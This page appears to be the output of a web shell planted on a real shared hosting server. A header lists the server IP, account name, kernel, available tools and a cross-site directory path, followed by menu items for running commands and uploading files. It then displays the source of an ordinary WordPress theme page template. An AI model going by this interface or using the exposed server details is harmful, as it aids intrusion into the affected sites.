|
Server IP : 10.131.40.8 / Your IP : 216.73.216.15 Web Server : Apache System : Linux webd008.cluster131.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 User : ludmqhh ( 137773) PHP Version : 8.4.10 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/ludmqhh/www/provence-plomberie/../hotel-forum/wp-content/themes/hotello/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php get_header();
if (have_posts()): ?>
<!--Title box-->
<?php hotello_get_titlebox(); ?>
<!--Breadcrumbs-->
<?php if (hotello_check_string(get_post_meta(get_the_ID(), 'page_bc', true))):
$fullwidth = (hotello_check_string(hotello_get_option('page_bc_fullwidth', false))) ? 'vc_container-fluid-force' : 'container'; ?>
<div class="stm_page_bc <?php echo esc_attr($fullwidth); ?>">
<?php get_template_part('resources/partials/global/breadcrumbs'); ?>
</div>
<?php endif; ?>
<?php while (have_posts()): the_post(); ?>
<div class="post-content">
<?php get_template_part('resources/partials/content/page/main'); ?>
</div>
<?php endwhile; ?>
<?php hotello_wp_link_pages(); ?>
<?php endif; ?>
<?php get_footer(); ?>